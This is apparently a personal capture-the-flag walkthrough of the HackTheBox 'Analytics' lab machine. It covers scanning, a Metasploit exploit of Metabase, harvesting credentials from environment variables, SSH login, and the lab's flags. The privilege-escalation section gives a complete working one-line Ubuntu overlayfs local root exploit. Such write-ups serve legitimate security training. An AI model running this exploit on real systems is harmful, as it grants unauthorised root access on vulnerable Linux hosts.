Analytics

This is my walkthrough for HackTheBox

First we scan the Machine

nmap -T4 -Pn -v 10.129.85.38

We see port 22 and 80 open.

Browse to the website and we get an error, add the IP and domain to the hosts file.

Now going back to the website we can look around!

Looking around, we see the Login page at the top. Checking that out, it doesn't work BUT the URL has changed to data.analytical.htb, so let's add that to the hosts file as well.

When looking we see it's running Metabase.

In Metasploit we see a potential exploit

Let's check the options and set them

Send the exploit....

We have a shell! Now let's see if we can get and run linpeas.

We can! Run it!

We see in the "Environment" section, a user and a password

META_USER=metalytics
META_PASS=An4lytics_ds20223#

Let's ssh into the machine with the newly discovered username and password.

ssh metalytics@10.129.85.38

Got the user flag! 5f24e4536b318d506fe1a38fbbd959fa

Priv Escalation

I seen we were running Ubuntu 22.04.3 as we logged in.

unshare -rm sh -c "mkdir 1 u w m && cp /u*/b*/p*3 1/; setcap cap_setuid+eip 1/python3;mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w, m && touch m/*;" && u/python3 -c 'import pty; import os;os.setuid(0); pty.spawn("/bin/bash")'

We have root! f35c47aac97cb1a6b5450d4eb024a3cc